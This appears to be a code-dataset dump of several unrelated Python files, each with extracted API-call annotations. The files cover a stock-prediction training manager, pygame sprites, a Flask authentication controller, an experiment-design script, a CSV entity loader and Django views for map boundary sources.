            self.__contained_population.load(previous_model_file)
        else:
            num_indicators = len(data[next(iter(data.keys()))][0])
            input_shape = (num_indicators, self.__periods_per_example)
            self.__contained_population = TradingPopulation(input_shape, 1000, self.__num_individuals,
                                                            self.__mutation_chance, self.__mutation_magnitude,
                                                            self.__crossover_chance)
        # Re-window every ticker's raw daily data into training examples.
        consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]] = {}
        for ticker, ticker_data in data.items():
            daily_data, closing_prices = ticker_data
            consolidated_data[ticker] = self.construct_examples(daily_data, closing_prices)
        self.__train_model(consolidated_data, previous_model_file)
        self.__contained_population.save(previous_model_file)

    def __print_best_fitness_by_ticker(self, best_fitness_by_ticker: Dict[str, List[float]]) -> None:
        # Logs each ticker's best fitness values; the template expects exactly
        # three positional values per ticker.
        output_template = "{ticker}:\n\t{:.2f}\n\t{:.2f}\n\t{:.2f}\n"
        for ticker, fitness in best_fitness_by_ticker.items():
            logger.logger.log(logger.INFORMATION, output_template.format(
                ticker=ticker, *fitness
            ))

    def __train_model(self, consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]], previous_model_file: str):
        """Run the configured number of epochs, checkpointing every save interval."""
        for i in tqdm.tqdm(range(self.__num_epochs)):
            best_fitness_by_ticker = {}
            for ticker, ticker_data in consolidated_data.items():
                daily_data, closing_prices = ticker_data
                best_fitness = self.__contained_population.train(daily_data, 1, closing_prices)
                best_fitness_by_ticker[ticker] = best_fitness
            self.__print_best_fitness_by_ticker(best_fitness_by_ticker)
            if i % self.__save_interval == 0:
                self.__contained_population.save(previous_model_file)
        self.__contained_population.save(previous_model_file)

    def predict_data(self, data, passback, in_model_dir):
        """Load the checkpointed population and produce buy/sell predictions.

        Returns {ticker: (latest per-model prediction, per-model accuracies)},
        where accuracies come from scoring all-but-the-last historical
        predictions against the closing price series.
        """
        in_dir = in_model_dir + path.sep + 'evolutionary_computation_models'
        if not path.exists(in_dir):
            raise FileNotFoundError("Model storage directory for EC prediction does not exist. Please run"
                                    "Model Creation Main without the prediction flag set to True, and with the"
                                    "EC Manager's Enabled config to True to create models."
                                    )
        self.__contained_population = TradingPopulation((0, 0), 0, 0)
        self.__contained_population.load(in_dir + path.sep + 'evolution_individuals.ecp')
        consolidated_data: Dict[str, Tuple[np.ndarray, List[float]]] = {}
        for ticker, ticker_data in data.items():
            daily_data, closing_prices = ticker_data
            consolidated_data[ticker] = self.construct_examples(daily_data, closing_prices)
        predictions = {}
        for ticker, prediction_data in consolidated_data.items():
            daily_data, closing_prices = prediction_data
            model_predictions = []
            for i in range(len(daily_data)):
                prediction = self.__contained_population.predict(daily_data[i])
                model_predictions.append(prediction)
            # Score the historical predictions to estimate model accuracy.
            truths = prediction_truth_calculation(model_predictions[:-1], closing_prices)
            accuracies = extract_accuracy_from_prediction_truths(truths)
            prediction = self.__contained_population.predict(daily_data[-1])
            predictions[ticker] = (prediction, accuracies)
        return predictions

    def load_configuration(self, parser: "ConfigParser"):
        """Read hyper-parameters from this consumer's config section and,
        when enabled, register with the data-provider registry."""
        section = config_util.create_type_section(parser, self)
        # Backfill any missing options with defaults before reading them.
        for identifier in _CONFIGURABLE_IDENTIFIERS:
            if not parser.has_option(section.name, identifier):
                self.write_default_configuration(section)
        enabled = parser.getboolean(section.name, _ENABLED_CONFIGURATION_IDENTIFIER)
        self.__periods_per_example = parser.getint(section.name, _EXAMPLE_COMBINATION_FACTOR_IDENTIFIER)
        self.__num_individuals = parser.getint(section.name, _NUM_INDIVIDUALS_IDENTIFIER)
        self.__num_epochs = parser.getint(section.name, _NUM_EPOCHS_IDENTIFIER)
        self.__save_interval = parser.getint(section.name, _MODEL_CHECKPOINT_EPOCH_INTERVAL_IDENTIFIER)
        self.__mutation_chance = parser.getfloat(section.name, _MUTATION_CHANCE_IDENTIFIER)
        self.__mutation_magnitude = parser.getfloat(section.name, _MUTATION_MAGNITUDE_IDENTIFIER)
        self.__crossover_chance = parser.getfloat(section.name, _CROSSOVER_CHANCE_IDENTIFIER)
        block_length = parser.getint(section.name, _TDP_BLOCK_LENGTH_IDENTIFIER)
        if enabled:
            data_provider_registry.registry.register_consumer(
                data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,
                self,
                [block_length],
                data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,
                keyword_args={'ema_period': [10, 15, 20]},
                data_exportation_function=export_predictions,
                prediction_string_serializer=string_serialize_predictions
            )

    def write_default_configuration(self, section: "SectionProxy"):
        """Fill any options missing from ``section`` with _CONFIGURATION_DEFAULTS."""
        for i in range(len(_CONFIGURABLE_IDENTIFIERS)):
            if not _CONFIGURABLE_IDENTIFIERS[i] in section:
                section[_CONFIGURABLE_IDENTIFIERS[i]] = _CONFIGURATION_DEFAULTS[i]

    def construct_examples(self, daily_data: np.ndarray, closing_prices: List[float]) -> Tuple[np.ndarray, List[float]]:
        """Slice ``daily_data`` into overlapping windows of
        ``periods_per_example`` columns, aligning closing prices to the last
        day of each window."""
        ret_daily_data = np.zeros((
            daily_data.shape[1] - self.__periods_per_example + 1,
            len(daily_data),
            self.__periods_per_example
        ))
        for i in range(self.__periods_per_example, daily_data.shape[1]+1):
            ret_daily_data[i - self.__periods_per_example] = daily_data[:, i - self.__periods_per_example: i]
        return ret_daily_data, closing_prices[self.__periods_per_example-1:]
# Import-time side effect: instantiating the manager registers it with the
# configurable registry. Skipped when running under tests.
if "testing" not in os.environ:
    consumer = EvolutionaryComputationManager()
|
[
"os.mkdir",
"data_providing_module.data_provider_registry.registry.register_consumer",
"data_providing_module.configurable_registry.config_registry.register_configurable",
"os.path.exists",
"numpy.where",
"stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation",
"general_utils.config.config_util.create_type_section"
] |
[((3132, 3178), 'numpy.where', 'np.where', (['(actual_predictions == 1)', '(True)', '(False)'], {}), '(actual_predictions == 1, True, False)\n', (3140, 3178), True, 'import numpy as np\n'), ((6217, 6282), 'data_providing_module.configurable_registry.config_registry.register_configurable', 'configurable_registry.config_registry.register_configurable', (['self'], {}), '(self)\n', (6276, 6282), False, 'from data_providing_module import configurable_registry, data_provider_registry\n'), ((6957, 6989), 'os.path.exists', 'path.exists', (['previous_model_file'], {}), '(previous_model_file)\n', (6968, 6989), False, 'from os import path\n'), ((9688, 9719), 'stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation', 'TradingPopulation', (['(0, 0)', '(0)', '(0)'], {}), '((0, 0), 0, 0)\n', (9705, 9719), False, 'from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation\n'), ((10862, 10907), 'general_utils.config.config_util.create_type_section', 'config_util.create_type_section', (['parser', 'self'], {}), '(parser, self)\n', (10893, 10907), False, 'from general_utils.config import config_util, config_parser_singleton\n'), ((6812, 6832), 'os.path.exists', 'path.exists', (['out_dir'], {}), '(out_dir)\n', (6823, 6832), False, 'from os import path\n'), ((6847, 6864), 'os.mkdir', 'os.mkdir', (['out_dir'], {}), '(out_dir)\n', (6855, 6864), False, 'import os\n'), ((7034, 7065), 'stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation', 'TradingPopulation', (['(0, 0)', '(0)', '(0)'], {}), '((0, 0), 0, 0)\n', (7051, 7065), False, 'from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation\n'), ((7331, 7472), 'stock_data_analysis_module.ml_models.evolutionary_computation.TradingPopulation', 'TradingPopulation', (['input_shape', '(1000)', 'self.__num_individuals', 'self.__mutation_chance', 'self.__mutation_magnitude', 'self.__crossover_chance'], {}), '(input_shape, 1000, 
self.__num_individuals, self.\n __mutation_chance, self.__mutation_magnitude, self.__crossover_chance)\n', (7348, 7472), False, 'from stock_data_analysis_module.ml_models.evolutionary_computation import TradingPopulation\n'), ((9275, 9294), 'os.path.exists', 'path.exists', (['in_dir'], {}), '(in_dir)\n', (9286, 9294), False, 'from os import path\n'), ((11958, 12342), 'data_providing_module.data_provider_registry.registry.register_consumer', 'data_provider_registry.registry.register_consumer', (['data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID', 'self', '[block_length]', 'data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID'], {'keyword_args': "{'ema_period': [10, 15, 20]}", 'data_exportation_function': 'export_predictions', 'prediction_string_serializer': 'string_serialize_predictions'}), "(data_provider_static_names\n .CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID, self, [block_length],\n data_provider_static_names.CLOSING_PRICE_REGRESSION_BLOCK_PROVIDER_ID,\n keyword_args={'ema_period': [10, 15, 20]}, data_exportation_function=\n export_predictions, prediction_string_serializer=\n string_serialize_predictions)\n", (12007, 12342), False, 'from data_providing_module import configurable_registry, data_provider_registry\n')]
|
import pygame
size = width, height = 350,500 #Screen Size
class Background(pygame.sprite.Sprite):
    """Static background sprite anchored at a given (left, top) location."""

    def __init__(self, image_file, location):
        # Initialise the base Sprite machinery before adding our own state.
        super().__init__()
        self.image = pygame.image.load(image_file)
        self.rect = self.image.get_rect()
        left, top = location
        self.rect.left, self.rect.top = left, top
class Straw_class(pygame.sprite.Sprite):
    """A straw obstacle sprite that drifts left at a constant speed."""

    def __init__(self, start_x, start_y, size_x, size_y, inverted):
        super().__init__()
        raw_image = pygame.image.load('Images/canudo_mal_feito.png')
        self.image = pygame.transform.scale(raw_image, (size_x, size_y))
        if inverted:
            # Flip the straw upside down for ceiling-mounted obstacles.
            self.image = pygame.transform.rotozoom(self.image, 180, 1)
        self.rect = self.image.get_rect()
        self.rect.move_ip((start_x, start_y))
        self.vel = [0, 0]
        self.accel = [-4, 0]

    def update(self):
        # Velocity simply tracks acceleration (constant leftward drift).
        self.vel[0] = self.accel[0]
        self.vel[1] = self.accel[1]
        self.rect.move_ip(*self.vel)
|
[
"pygame.image.load",
"pygame.transform.rotozoom",
"pygame.sprite.Sprite.__init__"
] |
[((153, 188), 'pygame.sprite.Sprite.__init__', 'pygame.sprite.Sprite.__init__', (['self'], {}), '(self)\n', (182, 188), False, 'import pygame\n'), ((236, 265), 'pygame.image.load', 'pygame.image.load', (['image_file'], {}), '(image_file)\n', (253, 265), False, 'import pygame\n'), ((540, 588), 'pygame.image.load', 'pygame.image.load', (['"""Images/canudo_mal_feito.png"""'], {}), "('Images/canudo_mal_feito.png')\n", (557, 588), False, 'import pygame\n'), ((641, 686), 'pygame.transform.rotozoom', 'pygame.transform.rotozoom', (['self.image', '(180)', '(1)'], {}), '(self.image, 180, 1)\n', (666, 686), False, 'import pygame\n')]
|
from flask import Flask, request, make_response
import re
from app import db, bcrypt
from pkg.models.auth_models import user
from pkg.helpers.authentication import generateToken
class Auth:
    """Signup/login controller backed by the `user` model and bcrypt hashing."""

    def init(self):
        # NOTE(review): named `init`, not `__init__`, so it is never called
        # automatically; kept as-is for interface compatibility.
        pass

    def signup(self):
        """Validate the signup payload and create the user.

        Returns a JSON response: 201 with the user + token on success,
        400 on validation failure, 409 when the email is already taken.
        """
        name = request.json['name']
        email = request.json['email']
        unhashed_password = request.json['password']
        password = bcrypt.generate_password_hash(
            unhashed_password).decode('utf-8')
        if len(email) < 1:
            return make_response({
                'status': 400,
                'data': {
                    'message': "Email is requred",
                }
            }, 400)
        # BUG FIX: validate the *plain* password. The original checked
        # len(password), but `password` is the bcrypt hash, which is always
        # long, so the minimum-length check could never fire.
        elif len(unhashed_password) < 6:
            return make_response({
                'status': 400,
                'data': {
                    'message': "Password must be 6 or more characters",
                }
            }, 400)
        elif re.search(r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$", email):
            response = user.query.filter_by(email=email).first()
            if response:
                return make_response({
                    'status': 409,
                    'data': {
                        'error': 'User already exists'
                    }
                }, 409)
            else:
                new_user = user(name, email, password)
                db.session.add(new_user)
                db.session.commit()
                auth_user = {
                    'id': new_user.id,
                    'name': new_user.name,
                    'email': new_user.email,
                }
                return make_response({
                    'status': 201,
                    'data': {
                        'user': {
                            **auth_user,
                            'token': generateToken(auth_user)
                        }
                    }
                }, 201)
        else:
            # email is not valid
            return make_response({
                'status': 400,
                'data': {
                    'message': "Email is invalid",
                }
            }, 400)

    def login(self):
        """Authenticate a user.

        Returns 200 with the user + token on success, 404 for an unknown
        email, 400 for a wrong password.
        """
        email = request.json['email']
        unhashed_password = request.json['password']
        response = user.query.filter_by(email=email).first()
        # BUG FIX: the original read response.password *before* the
        # missing-user check (AttributeError for unknown emails) and dropped
        # the `return` on both error branches, so errors fell through.
        if not response:
            return make_response({
                'status': 404,
                'data': {
                    'message': 'User not found',
                }
            }, 404)
        password = response.password
        if not bcrypt.check_password_hash(password, unhashed_password):
            return make_response({
                'status': 400,
                'data': {
                    'message': 'Invalid login credentials',
                }
            }, 400)
        auth_user = {
            'id': response.id,
            'name': response.name,
            'email': response.email,
        }
        return make_response({
            'status': 200,
            'data': {
                'user': {
                    **auth_user,
                    'token': generateToken(auth_user)
                }
            }
        }, 200)


auth = Auth()
|
[
"pkg.models.auth_models.user",
"app.bcrypt.generate_password_hash",
"app.bcrypt.check_password_hash",
"pkg.models.auth_models.user.query.filter_by",
"app.db.session.commit",
"flask.make_response",
"pkg.helpers.authentication.generateToken",
"re.search",
"app.db.session.add"
] |
[((520, 596), 'flask.make_response', 'make_response', (["{'status': 400, 'data': {'message': 'Email is requred'}}", '(400)'], {}), "({'status': 400, 'data': {'message': 'Email is requred'}}, 400)\n", (533, 596), False, 'from flask import Flask, request, make_response\n'), ((2418, 2492), 'flask.make_response', 'make_response', (["{'status': 404, 'data': {'message': 'User not found'}}", '(404)'], {}), "({'status': 404, 'data': {'message': 'User not found'}}, 404)\n", (2431, 2492), False, 'from flask import Flask, request, make_response\n'), ((394, 442), 'app.bcrypt.generate_password_hash', 'bcrypt.generate_password_hash', (['unhashed_password'], {}), '(unhashed_password)\n', (423, 442), False, 'from app import db, bcrypt\n'), ((734, 835), 'flask.make_response', 'make_response', (["{'status': 400, 'data': {'message': 'Password must be 6 or more characters'}}", '(400)'], {}), "({'status': 400, 'data': {'message':\n 'Password must be 6 or more characters'}}, 400)\n", (747, 835), False, 'from flask import Flask, request, make_response\n'), ((930, 999), 're.search', 're.search', (['"""^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,}$"""', 'email'], {}), "('^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,}$', email)\n", (939, 999), False, 'import re\n'), ((2300, 2333), 'pkg.models.auth_models.user.query.filter_by', 'user.query.filter_by', ([], {'email': 'email'}), '(email=email)\n', (2320, 2333), False, 'from pkg.models.auth_models import user\n'), ((2596, 2651), 'app.bcrypt.check_password_hash', 'bcrypt.check_password_hash', (['password', 'unhashed_password'], {}), '(password, unhashed_password)\n', (2622, 2651), False, 'from app import db, bcrypt\n'), ((2666, 2755), 'flask.make_response', 'make_response', (["{'status': 400, 'data': {'message': 'Invalid login credentials'}}", '(400)'], {}), "({'status': 400, 'data': {'message':\n 'Invalid login credentials'}}, 400)\n", (2679, 2755), False, 'from flask import Flask, request, make_response\n'), ((2005, 2081), 
'flask.make_response', 'make_response', (["{'status': 400, 'data': {'message': 'Email is invalid'}}", '(400)'], {}), "({'status': 400, 'data': {'message': 'Email is invalid'}}, 400)\n", (2018, 2081), False, 'from flask import Flask, request, make_response\n'), ((1116, 1193), 'flask.make_response', 'make_response', (["{'status': 409, 'data': {'error': 'User already exists'}}", '(409)'], {}), "({'status': 409, 'data': {'error': 'User already exists'}}, 409)\n", (1129, 1193), False, 'from flask import Flask, request, make_response\n'), ((1343, 1370), 'pkg.models.auth_models.user', 'user', (['name', 'email', 'password'], {}), '(name, email, password)\n', (1347, 1370), False, 'from pkg.models.auth_models import user\n'), ((1388, 1412), 'app.db.session.add', 'db.session.add', (['new_user'], {}), '(new_user)\n', (1402, 1412), False, 'from app import db, bcrypt\n'), ((1429, 1448), 'app.db.session.commit', 'db.session.commit', ([], {}), '()\n', (1446, 1448), False, 'from app import db, bcrypt\n'), ((1024, 1057), 'pkg.models.auth_models.user.query.filter_by', 'user.query.filter_by', ([], {'email': 'email'}), '(email=email)\n', (1044, 1057), False, 'from pkg.models.auth_models import user\n'), ((3199, 3223), 'pkg.helpers.authentication.generateToken', 'generateToken', (['auth_user'], {}), '(auth_user)\n', (3212, 3223), False, 'from pkg.helpers.authentication import generateToken\n'), ((1842, 1866), 'pkg.helpers.authentication.generateToken', 'generateToken', (['auth_user'], {}), '(auth_user)\n', (1855, 1866), False, 'from pkg.helpers.authentication import generateToken\n')]
|
import numpy as np
from pydex.core.designer import Designer
def simulate(ti_controls, model_parameters):
    """Single-response exponential model: y = exp(theta_0 * t)."""
    growth_exponent = model_parameters[0] * ti_controls[0]
    return np.array([np.exp(growth_exponent)])
designer = Designer()
designer.simulate = simulate
# 21 equally spaced time-invariant control candidates on [0, 1]
# (the imaginary step in np.mgrid means "number of points").
reso = 21j
tic = np.mgrid[0:1:reso]
designer.ti_controls_candidates = np.array([tic]).T
np.random.seed(123)
# 100 parameter scenarios drawn from N(-1, 0.5) for the pseudo-Bayesian design.
n_scr = 100
designer.model_parameters = np.random.normal(loc=-1, scale=0.50, size=(n_scr, 1))
designer.initialize(verbose=2)
"""
Pseudo-bayesian type do not really matter in this case because only a single model
parameter is involved i.e, information is a scalar, all criterion becomes equivalent to
the information matrix itself.
"""
pb_type = 0
# pb_type = 1
# D-optimal design: maximize the determinant of the information matrix.
designer.design_experiment(
    designer.d_opt_criterion,
    pseudo_bayesian_type=pb_type,
    write=False,
    package="cvxpy",
    optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
# A-optimal design: minimize the trace of the inverse information matrix.
designer.design_experiment(
    designer.a_opt_criterion,
    pseudo_bayesian_type=pb_type,
    write=False,
    package="cvxpy",
    optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
# E-optimal design: maximize the smallest eigenvalue of the information matrix.
designer.design_experiment(
    designer.e_opt_criterion,
    pseudo_bayesian_type=pb_type,
    write=False,
    package="cvxpy",
    optimizer="MOSEK",
)
designer.print_optimal_candidates()
designer.plot_optimal_controls()
designer.show_plots()
|
[
"numpy.random.seed",
"pydex.core.designer.Designer",
"numpy.array",
"numpy.exp",
"numpy.random.normal"
] |
[((202, 212), 'pydex.core.designer.Designer', 'Designer', ([], {}), '()\n', (210, 212), False, 'from pydex.core.designer import Designer\n'), ((332, 351), 'numpy.random.seed', 'np.random.seed', (['(123)'], {}), '(123)\n', (346, 351), True, 'import numpy as np\n'), ((392, 444), 'numpy.random.normal', 'np.random.normal', ([], {'loc': '(-1)', 'scale': '(0.5)', 'size': '(n_scr, 1)'}), '(loc=-1, scale=0.5, size=(n_scr, 1))\n', (408, 444), True, 'import numpy as np\n'), ((313, 328), 'numpy.array', 'np.array', (['[tic]'], {}), '([tic])\n', (321, 328), True, 'import numpy as np\n'), ((138, 182), 'numpy.exp', 'np.exp', (['(model_parameters[0] * ti_controls[0])'], {}), '(model_parameters[0] * ti_controls[0])\n', (144, 182), True, 'import numpy as np\n')]
|
import argparse
import sys
from typing import Sequence
from exabel_data_sdk import ExabelClient
from exabel_data_sdk.client.api.bulk_insert import BulkInsertFailedError
from exabel_data_sdk.client.api.data_classes.entity import Entity
from exabel_data_sdk.scripts.csv_script import CsvScript
from exabel_data_sdk.util.resource_name_normalization import normalize_resource_name
class LoadEntitiesFromCsv(CsvScript):
"""
Processes a CSV file with entities and creates them in the Exabel API.
The CSV file should have a header line specifying the column names.
The command line argument --name-column specifies the column from which to read
the entity names. The entity names are automatically normalized to create a valid
resource name for the entity.
For instance, if the entity type is "brand", and the namespace is "acme", and the entity name
is "<NAME>", the generated resource name will be:
entityTypes/brand/entities/acme.Spring_Vine
Optionally, another column may specify a display name for the entity, and another column
may give a description for the entity.
"""
def __init__(self, argv: Sequence[str], description: str):
super().__init__(argv, description)
self.parser.add_argument(
"--entity-type",
required=False,
type=str,
help="The type of the entities to be loaded. Must already exist in the data model. "
"If not specified, defaults to the same value as the name_column argument.",
)
self.parser.add_argument(
"--name-column",
required=False,
type=str,
help="The column name for the entity name. "
"If not specified, defaults to the first column in the file.",
)
self.parser.add_argument(
"--display-name-column",
required=False,
type=str,
help="The column name for the entity's display name. "
"If not specified, uses the entity name",
)
self.parser.add_argument(
"--description-column",
required=False,
type=str,
help="The column name for the entity description. "
"If not specified, no description is provided.",
)
def run_script(self, client: ExabelClient, args: argparse.Namespace) -> None:
if args.dry_run:
print("Running dry-run...")
print("Loading entities from", args.filename)
name_col_ref = args.name_column or 0
string_columns = {
name_col_ref,
args.display_name_column or name_col_ref,
}
if args.description_column:
string_columns.add(args.description_column)
entities_df = self.read_csv(args, string_columns=string_columns)
name_col = args.name_column or entities_df.columns[0]
display_name_col = args.display_name_column or name_col
description_col = args.description_column
entity_type_name = f"entityTypes/{args.entity_type or name_col}"
entity_type = client.entity_api.get_entity_type(entity_type_name)
if not entity_type:
print("Failure: Did not find entity type", entity_type_name)
print("Available entity types are:")
print(client.entity_api.list_entity_types())
sys.exit(1)
entities = [
Entity(
name=f"{entity_type_name}/entities/{args.namespace}."
f"{normalize_resource_name(row[name_col])}",
display_name=row[display_name_col],
description=row[description_col] if description_col else "",
)
for _, row in entities_df.iterrows()
]
if args.dry_run:
print("Loading", len(entities), "entities")
print(entities)
return
try:
client.entity_api.bulk_create_entities(entities, entity_type_name, threads=args.threads)
except BulkInsertFailedError:
# An error summary has already been printed.
pass
if __name__ == "__main__":
LoadEntitiesFromCsv(sys.argv, "Upload entities file.").run()
|
[
"exabel_data_sdk.util.resource_name_normalization.normalize_resource_name",
"sys.exit"
] |
[((3383, 3394), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (3391, 3394), False, 'import sys\n'), ((3526, 3564), 'exabel_data_sdk.util.resource_name_normalization.normalize_resource_name', 'normalize_resource_name', (['row[name_col]'], {}), '(row[name_col])\n', (3549, 3564), False, 'from exabel_data_sdk.util.resource_name_normalization import normalize_resource_name\n')]
|
from django.http.response import HttpResponse
from django.shortcuts import render, redirect
from django.http import JsonResponse
from django.forms.models import fields_for_model, model_to_dict
from django.views.decorators.csrf import csrf_exempt
from django.db import transaction
from . import models
from . import forms
import json
# Create your views here.
def overview(request):
if request.method == 'GET':
context = {'names':request.GET['names'].split('|')}
return render(request, 'overview.html', context)
def source(request, pk):
'''View of a source'''
src = models.BoundarySource.objects.get(pk=pk)
toplevel_refs = src.boundary_refs.filter(parent=None)
context = {'source':src, 'toplevel_refs':toplevel_refs}
print('typ',src,repr(src.type))
if src.type == 'TextSource':
return render(request, 'source_text.html', context)
elif src.type == 'DataSource':
import_params = src.importer.import_params
try: import_params = json.dumps(import_params, indent=4)
except: pass
context['import_params'] = import_params
return render(request, 'source_data.html', context)
elif src.type == 'MapSource':
levels = src.boundary_refs.all().values_list('level').distinct()
levels = [lvl[0] for lvl in levels]
context['levels'] = sorted(levels)
return render(request, 'source_map.html', context)
def datasource_add(request):
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(initial={'type':'DataSource'})
context = {'form': form}
return render(request, 'source_data_add.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data)
if form.is_valid():
form.save()
source = form.instance
# save importer
from dataImporter.models import DataImporter
import_params = json.loads(data['import_params'])
importer = DataImporter(source=source, import_params=import_params)
importer.save()
return redirect('source', source.pk)
else:
return render(request, 'source_data_add.html', {'form':form})
def mapsource_add(request):
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(initial={'type':'MapSource'})
context = {'form': form}
return render(request, 'source_map_add.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data)
if form.is_valid():
form.save()
source = form.instance
return redirect('source', source.pk)
else:
return render(request, 'source_map_add.html', {'form':form})
def textsource_add(request):
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(initial={'type':'TextSource'})
context = {'form': form}
return render(request, 'source_text_add.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data)
if form.is_valid():
form.save()
source = form.instance
return redirect('source', source.pk)
else:
return render(request, 'source_text_add.html', {'form':form})
def datasource_edit(request, pk):
'''Edit of a data source'''
src = models.BoundarySource.objects.get(pk=pk)
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(instance=src)
import_params = src.importer.import_params
try: import_params = json.dumps(import_params, indent=4)
except: pass
context = {'form': form, 'import_params': import_params}
return render(request, 'source_data_edit.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data, instance=src)
if form.is_valid():
form.save()
# save importer
importer = src.importer
importer.import_params = json.loads(data['import_params'])
importer.save()
return redirect('source', src.pk)
else:
return render(request, 'source_data_edit.html', {'form':form})
def mapsource_edit(request, pk):
'''Edit of a map source'''
src = models.BoundarySource.objects.get(pk=pk)
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(instance=src)
context = {'form': form}
return render(request, 'source_map_edit.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data, instance=src)
if form.is_valid():
form.save()
return redirect('source', src.pk)
else:
return render(request, 'source_map_edit.html', {'form':form})
def textsource_edit(request, pk):
'''Edit of a text source'''
src = models.BoundarySource.objects.get(pk=pk)
if request.method == 'GET':
# create empty form
form = forms.BoundarySourceForm(instance=src)
context = {'form': form}
return render(request, 'source_text_edit.html', context)
elif request.method == 'POST':
with transaction.atomic():
# save form data
data = request.POST
form = forms.BoundarySourceForm(data, instance=src)
if form.is_valid():
form.save()
return redirect('source', src.pk)
else:
return render(request, 'source_text_edit.html', {'form':form})
def boundary(request, pk):
'''View of a boundary ref instance.'''
ref = models.BoundaryReference.objects.get(pk=pk)
# main snapshot
snap = ref.snapshots.first()
if snap:
geom = snap.geom.__geo_interface__
main_geoj = {'type':'Feature', 'geometry':geom}
main_geoj = json.dumps(main_geoj)
else:
main_geoj = 'null'
# hierarchy snapshots
subrefs = ref.children.all()
if subrefs:
hier_geoj = {'type':'FeatureCollection', 'features':[]}
for subref in subrefs:
snap = subref.snapshots.first()
if snap:
geom = snap.geom.__geo_interface__
feat = {'type':'Feature', 'geometry':geom}
hier_geoj['features'].append(feat)
hier_geoj = json.dumps(hier_geoj)
else:
hier_geoj = 'null'
context = {'boundary_ref':ref,
'main_geojson':main_geoj,
'hier_geojson':hier_geoj,
}
return render(request, 'boundaryref.html', context)
'''
def snapshot(request, pk):
#''View of a snapshot instance.''
snap = models.BoundarySnapshot.objects.get(pk=pk)
geom = snap.geom.__geo_interface__
geoj = {'type':'Feature', 'geometry':geom}
# find matching snapshots
ref_matches = _match_boundary_ref(snap.boundary_ref)
snapshot_matches = models.BoundarySnapshot.objects.filter(boundary_ref__in=ref_matches) | models.BoundarySnapshot.objects.filter(boundary_ref__parent__in=ref_matches)
from datetime import date
date_starts = [s.event.date_start for s in snapshot_matches]
date_ends = [s.event.date_end for s in snapshot_matches]
mindate_num = date.fromisoformat(min(date_starts)).toordinal()
maxdate_num = date.fromisoformat(max(date_ends)).toordinal()
date_start = date.fromisoformat(snap.event.date_start).toordinal()
date_end = date.fromisoformat(snap.event.date_end).toordinal()
for s in snapshot_matches:
start = date.fromisoformat(s.event.date_start).toordinal()
end = date.fromisoformat(s.event.date_end).toordinal()
s.date_start_perc = (start - mindate_num) / (maxdate_num - mindate_num) * 100
s.date_end_perc = (end - mindate_num) / (maxdate_num - mindate_num) * 100
s.date_dur_perc = s.date_end_perc - s.date_start_perc
mid = (start + end) / 2.0
s.date_dist = min(abs(date_start-mid), abs(date_end-mid))
key = lambda s: s.date_dist
snapshot_matches = sorted(snapshot_matches, key=key)
ticks = []
numticks = 5
incr = (maxdate_num - mindate_num) / (numticks-1)
cur = mindate_num
while cur <= maxdate_num:
print(cur)
perc = (cur - mindate_num) / (maxdate_num - mindate_num) * 100
ticks.append({'label':date.fromordinal(int(cur)), 'percent':perc})
cur += incr
print(ticks)
context = {'snapshot':snap, 'geojson':json.dumps(geoj),
'snapshot_matches':snapshot_matches,
'mindate':min(date_starts), 'maxdate':max(date_ends),
'ticks':ticks}
return render(request, 'snapshot.html', context)
'''
# API
def _match_boundary_ref(match_ref):
parents = match_ref.get_all_parents()
parent_names = [p.names.first().name for p in parents]
# build hierarchical search terms (lowest to highest)
terms = [s.strip() for s in parent_names if s.strip()]
# find all refs matching the lowest term (at any level)
refs = models.BoundaryReference.objects.filter(names__name__istartswith=terms[0])
#print(refs.query)
#print(refs.explain())
# calc match score by adding parent filters based on additional search terms
ref_scores = {}
for ref in refs:
if len(terms) > 1:
# hierarchical search terms
parent_matches = [1]
for t in terms[1:]:
_matches = [n.name.lower().startswith(t.lower())
for parent in ref.get_all_parents(include_self=False)
for n in parent.names.all()]
has_match = 1 if any(_matches) else 0
parent_matches.append(has_match)
max_score = max(len(terms), len(parent_matches))
score = sum(parent_matches) / max_score
else:
# single search term
score = 1
ref_scores[ref.id] = score
# get any snapshot belonging to the matched refs or its immediate parent
matches = sorted(refs, key=lambda r: max([ref_scores.get(par.id,0) for par in r.get_all_parents()]), reverse=True)
return matches
def _parse_date(dateval):
'''Can be a year, year-month, or year-month-day'''
if '/' in dateval:
# from and to datestrings
fromdate,todate = dateval.split('/')
fromdate,todate = fromdate.strip(),todate.strip()
if fromdate and todate:
start1,end1 = _parse_date(fromdate)
start2,end2 = _parse_date(todate)
return min(start1,start2), max(end1,end2)
elif fromdate:
start,end = _parse_date(fromdate)
return start,None
elif todate:
